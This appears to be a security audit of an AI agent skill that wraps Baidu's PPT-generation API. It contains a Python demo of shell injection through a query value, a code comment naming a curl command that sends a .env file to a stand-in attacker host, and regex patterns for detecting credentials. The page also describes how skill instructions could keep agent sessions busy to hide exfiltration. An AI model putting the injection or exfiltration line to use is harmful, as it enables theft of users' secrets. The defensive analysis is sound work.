Is ai-ppt-generator safe?
https://clawhub.ai/ide-rea/ai-ppt-generator
The ai-ppt-generator skill is a thin wrapper around Baidu's AI PPT generation API: it sends user queries verbatim to Chinese cloud infrastructure (qianfan.baidubce.com) with no local processing or data filtering. No overt malicious behavior was detected, but the skill raises data-handling concerns (unfiltered transmission of user content to an external service), a supply-chain concern (an undeclared dependency), and an agent-behavior concern (SKILL.md instructions that extend session timeouts). The installation phase showed reads of sensitive credential files (.env, .aws/credentials), though this appears to be platform behavior rather than something the skill initiates.
Findings (12)
HIGH User queries sent verbatim to external Chinese cloud API -35
All user input passed via --query is transmitted directly to qianfan.baidubce.com (Baidu AI) with no local sanitization, content filtering, or data minimization. Users may unknowingly send sensitive business content to Baidu's servers when generating PPTs.
HIGH API key transmitted to external service -20
BAIDU_API_KEY is read from the environment and sent as a Bearer token to Baidu's API. That is the intended design, but the skill does nothing to confirm that the endpoint it talks to is the legitimate one. Note that DNS spoofing alone only exposes the token if the request goes over plain HTTP or TLS certificate verification has been disabled; the more practical concern is endpoint substitution, for example a changed base URL in a modified copy of the script, which nothing in the skill would detect.
MEDIUM Undeclared external dependency (requests library) -15
The script imports 'requests', but no requirements.txt or package.json exists for the ai-ppt-generator skill. Either the dependency is assumed to be pre-installed or a separate, undocumented installation step is needed. An ad hoc install of an unpinned package resolves to whatever the index serves at that moment, with no version or hash to check against, which is exactly the gap a supply-chain attack exploits.
MEDIUM Command-line argument injection surface -15
The --query parameter accepts arbitrary user input as a command-line argument. If the calling agent builds a shell command string around the query instead of passing it as a separate argv element (or quoting it), this is a shell injection vector.
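The difference between the two invocation styles, as an added example that is not part of the skill or of this audit. It uses echo as a harmless stand-in for the skill's CLI (so the injected command shows up as an extra line of output rather than doing damage) and a constructed query string; no real skill code is run.

```python
import shlex
import subprocess

# Stand-in for "python3 ai_ppt_generator.py --query": echo just reflects its
# arguments, so an injected command shows up as an extra line of output.
STUB_CLI = ["echo", "--query"]

# Constructed attacker-controlled query: a plausible prompt followed by a
# second shell command. In a real attack "echo INJECTED" would be something
# like "curl -d @.env attacker.example".
MALICIOUS_QUERY = "Q3 revenue deck; echo INJECTED"


def run_unsafe(query: str) -> str:
    """The injectable pattern: the agent concatenates the query into a shell
    command string and lets a shell parse it."""
    cmd = " ".join(STUB_CLI) + " " + query
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_safe_argv(query: str) -> str:
    """Pass the query as one argv element. No shell parses it, so ';' is just
    a character inside the argument."""
    return subprocess.run(STUB_CLI + [query], capture_output=True, text=True).stdout


def run_safe_quoted(query: str) -> str:
    """If a shell string is unavoidable (e.g. the agent only exposes a
    'run this command' tool), quote every untrusted token."""
    cmd = " ".join(STUB_CLI) + " " + shlex.quote(query)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def injected(output: str) -> bool:
    """True when the second command actually executed (its own output line)."""
    return "INJECTED" in output.splitlines()


if __name__ == "__main__":
    for fn in (run_unsafe, run_safe_argv, run_safe_quoted):
        out = fn(MALICIOUS_QUERY)
        print(f"{fn.__name__}: injected={injected(out)} output={out!r}")
```

Only run_unsafe prints INJECTED on its own line; both safe variants deliver the whole string, semicolon included, as the single --query value. The argv form is preferable because it needs no quoting discipline at all.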
MEDIUM Behavioral override instructions in SKILL.md -15
The SKILL.md instructs the agent to override its default timeout behavior, maintain long-running sessions (180+ seconds), and not treat slow responses as failures. While these are legitimate operational requirements, they could be weaponized to keep agent sessions occupied or to mask delayed exfiltration.
MEDIUM Arbitrary web content injection parameter -15
The --web_content parameter allows passing arbitrary content to the Baidu API. This could be abused to exfiltrate data by encoding it as 'web content' for PPT generation.
MEDIUM Sensitive file access during installation -30
The filesystem monitor detected reads of .env, .aws/credentials, and auth-profiles.json during the skill installation phase. While likely caused by the OpenClaw platform rather than the skill itself, this indicates sensitive credentials are exposed during the install process.
MEDIUM JIT compilation artifacts created during install -15
Multiple .cjs files were created in /tmp/jiti/ during installation, indicating a JIT compilation step. While likely from the OpenClaw platform, these compiled files could theoretically contain modified code.
LOW Skill metadata uses openclaw namespace instead of clawdbot -10
The skill uses 'openclaw' metadata namespace while the co-installed crypto-price uses 'clawdbot'. This inconsistency suggests the skill may be from a different ecosystem or forked platform, warranting additional scrutiny.
LOW No error sanitization in output -10
Exception handling prints raw error types and messages to stdout, which could leak internal system information (file paths, library versions, stack traces) back through the agent to the user or logs.
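A guard an agent could wrap around the skill's call, as an added example; it is not the skill's code and does not contact Baidu. It covers findings 1, 2, 6 and 10 above: pinning the endpoint to the host named in this audit (qianfan.baidubce.com), refusing input that matches credential patterns before the query or --web_content leaves the machine, and keeping raw exception text out of the agent-facing response. The transport callable, the secret patterns, the ERROR_LOG sink and the sample inputs are assumptions for illustration, not part of the skill.

```python
import re
from urllib.parse import urlparse

# Host named in this audit; anything else is refused before the Bearer token
# is attached. Over https with certificate verification left on (requests'
# default), this check plus TLS is what actually ties the token to Baidu.
ALLOWED_HOST = "qianfan.baidubce.com"

# Illustrative credential shapes that have no business in a slide-deck prompt.
# Assumptions for this example, not an exhaustive list; tune per environment.
SECRET_PATTERNS = {
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "bearer_token": re.compile(r"\bBearer\s+[A-Za-z0-9._~+/=-]{20,}"),
    "env_secret": re.compile(r"\b[A-Z][A-Z0-9_]*(?:KEY|SECRET|TOKEN|PASSWORD)=\S+"),
}

# Stand-in for an internal log sink; the agent-facing channel never sees it.
ERROR_LOG: list[str] = []


def endpoint_allowed(url: str) -> bool:
    """Only https to the pinned host. Rejects http://, look-alike hosts
    (qianfan.baidubce.com.evil.example) and userinfo tricks (host@evil)."""
    p = urlparse(url)
    return p.scheme == "https" and p.hostname == ALLOWED_HOST and p.username is None


def find_sensitive(text: str) -> list[str]:
    """Names of the patterns that match anywhere in the outbound text."""
    return sorted(name for name, rx in SECRET_PATTERNS.items() if rx.search(text))


def guarded_request(endpoint, api_key, query, web_content, transport):
    """Return (ok, result). transport(url, headers, body) performs the HTTP
    call; it is injected so this example runs offline."""
    if not endpoint_allowed(endpoint):
        return False, "refused: endpoint is not the expected Baidu origin"
    hits = find_sensitive(f"{query}\n{web_content or ''}")
    if hits:
        return False, "refused: outbound content matches " + ", ".join(hits)
    body = {"query": query}
    if web_content:
        body["web_content"] = web_content
    try:
        return True, transport(endpoint, {"Authorization": f"Bearer {api_key}"}, body)
    except Exception as exc:  # finding 10: details go to the log, not the caller
        ERROR_LOG.append(f"{type(exc).__name__}: {exc}")
        return False, "upstream request failed; see internal log"
```

In real use the transport would be a thin function around requests.post(url, headers=headers, json=body, timeout=...) with verification left at its default; the guard runs before any bytes leave the process, so a query or --web_content value that looks like a credential never reaches the network, and an exception carrying a local path is logged rather than echoed back through the agent.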
INFO Co-installed skill (crypto-price) not part of audit target -5
The ai-ppt-generator was installed alongside crypto-price, which is a separate skill with its own API calls and data handling. The interaction between these skills was not the focus of this audit but should be considered for holistic security assessment.
INFO Generated PPT files hosted on third-party infrastructure 0
The PPT download URLs returned by Baidu point to their cloud infrastructure. Users downloading these files are subject to Baidu's tracking, and the files could theoretically be modified server-side after generation.